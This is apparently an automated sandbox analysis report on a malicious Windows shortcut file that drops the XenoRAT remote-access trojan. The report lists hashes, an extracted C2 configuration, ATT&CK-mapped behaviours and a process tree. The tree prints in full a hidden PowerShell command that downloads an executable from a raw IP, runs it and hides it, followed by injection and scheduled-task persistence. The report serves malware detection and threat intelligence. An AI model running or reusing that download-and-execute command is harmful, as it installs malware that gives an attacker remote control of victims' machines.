Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
Resource
win7-20240704-en
General
-
Target
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
-
Size
2KB
-
MD5
4db66f511c6604f1be1ae032b84f8358
-
SHA1
8ab73293cf42ead05326874845622cea78822c8f
-
SHA256
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7
-
SHA512
2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67
Malware Config
Extracted
http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
Extracted
xenorat
45.66.231.63
Holid_rat_nd8859g
-
delay
60400
-
install_path
appdata
-
port
1243
-
startup_name
HDdisplay
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
PoWersheLl.exeflow pid process 6 4884 PoWersheLl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeDisplayResolution.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation DisplayResolution.exe -
Executes dropped EXE 10 IoCs
Processes:
DisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exepid process 1572 DisplayResolution.exe 3192 DisplayResolution.exe 804 DisplayResolution.exe 1776 DisplayResolution.exe 1720 DisplayResolution.exe 5100 DisplayResolution.exe 4444 DisplayResolution.exe 2360 DisplayResolution.exe 1096 DisplayResolution.exe 4664 DisplayResolution.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
DisplayResolution.exeDisplayResolution.exedescription pid process target process PID 1572 set thread context of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 set thread context of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 set thread context of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 set thread context of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 5100 set thread context of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 set thread context of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 set thread context of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 set thread context of 4664 5100 DisplayResolution.exe DisplayResolution.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4636 1720 WerFault.exe DisplayResolution.exe 4836 4444 WerFault.exe DisplayResolution.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
DisplayResolution.exeschtasks.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DisplayResolution.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
PoWersheLl.exepid process 4884 PoWersheLl.exe 4884 PoWersheLl.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
PoWersheLl.exeDisplayResolution.exeDisplayResolution.exedescription pid process Token: SeDebugPrivilege 4884 PoWersheLl.exe Token: SeDebugPrivilege 1572 DisplayResolution.exe Token: SeDebugPrivilege 5100 DisplayResolution.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exePoWersheLl.exeDisplayResolution.exeDisplayResolution.exeDisplayResolution.exedescription pid process target process PID 704 wrote to memory of 4884 704 cmd.exe PoWersheLl.exe PID 704 wrote to memory of 4884 704 cmd.exe PoWersheLl.exe PID 4884 wrote to memory of 1572 4884 PoWersheLl.exe DisplayResolution.exe PID 4884 wrote to memory of 1572 4884 PoWersheLl.exe DisplayResolution.exe PID 4884 wrote to memory of 1572 4884 PoWersheLl.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 3192 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 804 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1776 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1572 wrote to memory of 1720 1572 DisplayResolution.exe DisplayResolution.exe PID 1776 wrote to memory of 5100 1776 DisplayResolution.exe DisplayResolution.exe PID 1776 wrote to memory of 5100 1776 DisplayResolution.exe DisplayResolution.exe PID 1776 wrote to memory of 5100 1776 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 4444 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 2360 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe PID 5100 wrote to memory of 1096 5100 DisplayResolution.exe DisplayResolution.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:804 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8CBA.tmp" /F5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe"C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
PID:4444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 887⤵
- Program crash
PID:4836 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2360 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1096 -
C:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exeC:\Users\Admin\AppData\Roaming\XenoManager\DisplayResolution.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4664 -
C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exeC:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe4⤵
- Executes dropped EXE
PID:1720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 805⤵
- Program crash
PID:4636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1720 -ip 17201⤵PID:3756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4444 -ip 44441⤵PID:5076
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD5d95c58e609838928f0f49837cab7dfd2
SHA155e7139a1e3899195b92ed8771d1ca2c7d53c916
SHA2560407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339
SHA512405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d
-
Filesize
253KB
MD5e74db56e352d5015304af19ec21ffeb5
SHA1cf026e98f937ea8989a789fa8e43895f3f642431
SHA25654eafd9bd8105444ccd57e92dc3bee43166532da0a71e26686fe9913956f6243
SHA51232854f3b960a17c9051714d4b456517607f21e57547c6711b4ae2020c54462ca554edc01d789052a66e082637ed6cf9854e624b6d938c6c852a282de13299dc2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c1fb6c7a2a252aad9a614b2a29769d98
SHA1f6d4f83e1cb6612498178b151edfc155432138c6
SHA256da84b1e8d3d3d979614cb431546c9806ca977b2cf74c5b86e42598408814f292
SHA5123569c7553fda61cf8af6a0e7480e8fc4432ba7c8b6e00fb41e64ea1d73debf2000618ea1bdd193668ddbe43b1d77ae3c934ed80ffca983afc680cd8d595d2529